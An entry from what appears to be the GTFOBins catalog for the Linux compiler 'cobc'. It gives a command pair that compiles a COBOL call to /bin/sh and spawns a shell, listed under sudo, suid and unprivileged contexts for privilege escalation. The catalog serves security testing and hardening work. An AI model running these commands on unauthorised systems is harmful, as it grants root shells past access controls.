Catalog GTFOBins

GTFO · Tool

cobc

3 techniques LinuxGTFOBins GPL-3.0

shell

ExecutionPrivilege Escalation Linux

The `/path/to/temp-file` sill be overwritten after the execution.

echo 'CALL "SYSTEM" USING "/bin/sh".' >/path/to/temp-file
cobc -xFj --frelax-syntax-checks /path/to/temp-file
Context
sudo
Native
shell
MITRE
T1059

shell

ExecutionPrivilege Escalation Linux

The `/path/to/temp-file` sill be overwritten after the execution.

echo 'CALL "SYSTEM" USING "/bin/sh".' >/path/to/temp-file
cobc -xFj --frelax-syntax-checks /path/to/temp-file
Context
suid
Native
shell
MITRE
T1059

shell

Execution Linux

The `/path/to/temp-file` sill be overwritten after the execution.

echo 'CALL "SYSTEM" USING "/bin/sh".' >/path/to/temp-file
cobc -xFj --frelax-syntax-checks /path/to/temp-file
Context
unprivileged
Native
shell
MITRE
T1059